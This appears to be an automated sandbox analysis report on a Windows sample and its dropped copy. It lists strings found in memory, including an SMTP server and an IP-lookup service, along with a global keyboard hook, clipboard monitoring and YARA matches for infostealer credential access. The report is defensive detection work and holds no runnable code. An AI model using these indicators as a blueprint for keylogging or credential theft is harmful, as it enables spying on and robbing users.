                      Source: kAsh3nmsgs.exe, 00000008.00000002.4188725792.0000000008A7C000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4190577674.0000000008B54000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4148636839.0000000000FF0000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4147231136.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.000000000315E000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4189921949.0000000008ADA000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4168514999.000000000647B000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4190331509.0000000008B16000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.000000000303C000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003494000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4166846886.0000000006A4F000.00000004.00000020.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4187909040.0000000009423000.00000004.00000020.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4167554620.0000000006A77000.00000004.00000020.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4168112478.0000000006AB4000.00000004.00000020.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003415000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr103
                      Source: kAsh3nmsgs.exe, 00000008.00000002.4190331509.0000000008B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsig
                      Source: kAsh3nmsgs.exe, 00000008.00000002.4188725792.0000000008A7C000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4190577674.0000000008B54000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4188990103.0000000008A94000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4147231136.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.000000000315E000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4189921949.0000000008ADA000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4168514999.000000000647B000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.000000000303C000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003494000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4167554620.0000000006A77000.00000004.00000020.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4168112478.0000000006AB4000.00000004.00000020.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003415000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003384000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4188194749.0000000009443000.00000004.00000020.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4147346234.0000000001403000.00000004.00000020.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4187357779.0000000009408000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1730005072.00000000031FF000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 00000009.00000002.1769194056.000000000331F000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000002FD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4148636839.0000000000FF0000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4189046055.0000000008AA4000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4147231136.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4189921949.0000000008B0A000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.000000000315E000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4189921949.0000000008ADA000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4168514999.000000000647B000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4190577674.0000000008B33000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.000000000303C000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4148783650.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003494000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4188194749.000000000947F000.00000004.00000020.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4187909040.0000000009423000.00000004.00000020.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4167554620.0000000006A77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsrsaovsslca2018.crt07
                      Source: kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.000000000315E000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.000000000303C000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003494000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003415000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003384000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003161000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.000000000324F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.yandex.com
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1730748161.0000000004AC4000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 00000009.00000002.1771700675.0000000004BE4000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4146034790.0000000000435000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1730748161.0000000004AC4000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4146027823.0000000000434000.00000040.00000400.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 00000009.00000002.1771700675.0000000004BE4000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000002FD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: HHhSyZN.exe, 0000000D.00000002.4188194749.0000000009443000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/r
                      Source: kAsh3nmsgs.exe, 00000008.00000002.4188725792.0000000008A7C000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4190577674.0000000008B54000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4188990103.0000000008A94000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4148636839.0000000000FF0000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4189046055.0000000008AA4000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4147231136.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4189921949.0000000008B0A000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.000000000315E000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4189921949.0000000008ADA000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4168514999.000000000647B000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4190577674.0000000008B33000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4190331509.0000000008B16000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.000000000303C000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4148783650.0000000000FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49733 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49737 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Installs a global keyboard hook
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\kAsh3nmsgs.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\HHhSyZN.exe
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 0.2.kAsh3nmsgs.exe.4afe9e8.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 9.2.HHhSyZN.exe.4c1f8f8.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 9.2.HHhSyZN.exe.4be4ed8.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 9.2.HHhSyZN.exe.4c1f8f8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.kAsh3nmsgs.exe.4afe9e8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 9.2.HHhSyZN.exe.4be4ed8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 0_2_01482CC80_2_01482CC8
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 0_2_01482CD80_2_01482CD8
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 0_2_014836D10_2_014836D1
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 0_2_014836E00_2_014836E0
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 0_2_014838180_2_01483818
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 0_2_09D500400_2_09D50040
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 0_2_09D52DD80_2_09D52DD8
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 0_2_0A0428E80_2_0A0428E8
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 0_2_0A04B92F0_2_0A04B92F
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 0_2_0A04B9400_2_0A04B940
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 0_2_0A049E200_2_0A049E20
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 0_2_0A04BD680_2_0A04BD68
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 0_2_0A04BD780_2_0A04BD78
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 0_2_0A04A2580_2_0A04A258
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 0_2_0A04A2680_2_0A04A268
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 0_2_0A0452E80_2_0A0452E8
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 0_2_0A04001B0_2_0A04001B
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 0_2_0A0400400_2_0A040040
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 0_2_0A04A6A00_2_0A04A6A0
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 0_2_0F1822A80_2_0F1822A8
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 8_2_011741C88_2_011741C8
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 8_2_0117E2998_2_0117E299
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 8_2_0117A9688_2_0117A968
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 8_2_01174A988_2_01174A98
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 8_2_01173E808_2_01173E80
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 8_2_069256288_2_06925628
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 8_2_069266488_2_06926648
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 8_2_06927DD88_2_06927DD8
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 8_2_0692B2828_2_0692B282
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 8_2_069230E08_2_069230E0
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 8_2_0692C1E88_2_0692C1E8
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 8_2_069276F88_2_069276F8
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 8_2_0692E4008_2_0692E400
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 8_2_06925D3B8_2_06925D3B
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 8_2_069200408_2_06920040
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 8_2_06A118CA8_2_06A118CA
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 8_2_06A119028_2_06A11902
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 8_2_06A119088_2_06A11908
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeCode function: 8_2_069200258_2_06920025
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 9_2_015E2CD89_2_015E2CD8
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 9_2_015E2CC89_2_015E2CC8
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 9_2_015E36D19_2_015E36D1
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 9_2_015E36E09_2_015E36E0
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 9_2_015E38189_2_015E3818
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 9_2_098800409_2_09880040
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 9_2_09882DD89_2_09882DD8
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 9_2_0ADA0B089_2_0ADA0B08
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 9_2_0B2DB9409_2_0B2DB940
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 9_2_0B2D28E89_2_0B2D28E8
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 9_2_0B2D28D89_2_0B2D28D8
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 9_2_0B2D9E309_2_0B2D9E30
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 9_2_0B2DBD689_2_0B2DBD68
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 9_2_0B2DBD789_2_0B2DBD78
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 9_2_0B2DA2689_2_0B2DA268
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 9_2_0B2D00069_2_0B2D0006
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 9_2_0B2D00409_2_0B2D0040
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 9_2_0B2DA6A09_2_0B2DA6A0
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 13_2_015041C813_2_015041C8
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 13_2_0150E29913_2_0150E299
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 13_2_0150A96813_2_0150A968
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 13_2_01504A9813_2_01504A98
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 13_2_01503E8013_2_01503E80
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 13_2_06CAB48813_2_06CAB488
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 13_2_06CA30E013_2_06CA30E0
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 13_2_06CA76F813_2_06CA76F8
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 13_2_06CA004013_2_06CA0040
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 13_2_06D9190813_2_06D91908
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 13_2_06D9190213_2_06D91902
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeCode function: 13_2_06CA002113_2_06CA0021
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1730005072.0000000003254000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedf8fc031-c024-49b7-9cf2-cdfecdf01d4a.exe4 vs kAsh3nmsgs.exe
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1724628810.0000000000F1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs kAsh3nmsgs.exe
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1733831709.0000000007E10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs kAsh3nmsgs.exe
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1730748161.0000000004AC4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedf8fc031-c024-49b7-9cf2-cdfecdf01d4a.exe4 vs kAsh3nmsgs.exe
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1730005072.0000000002F19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs kAsh3nmsgs.exe
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1730748161.0000000004719000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs kAsh3nmsgs.exe
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1730748161.0000000004752000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs kAsh3nmsgs.exe
                      Source: kAsh3nmsgs.exe, 00000000.00000000.1679143670.0000000000B2C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametkXU.exe4 vs kAsh3nmsgs.exe
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1736515413.000000000B640000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs kAsh3nmsgs.exe
                      Source: kAsh3nmsgs.exe, 00000008.00000002.4146027823.000000000043C000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedf8fc031-c024-49b7-9cf2-cdfecdf01d4a.exe4 vs kAsh3nmsgs.exe
                      Source: kAsh3nmsgs.exe, 00000008.00000002.4146758846.0000000000CF8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs kAsh3nmsgs.exe
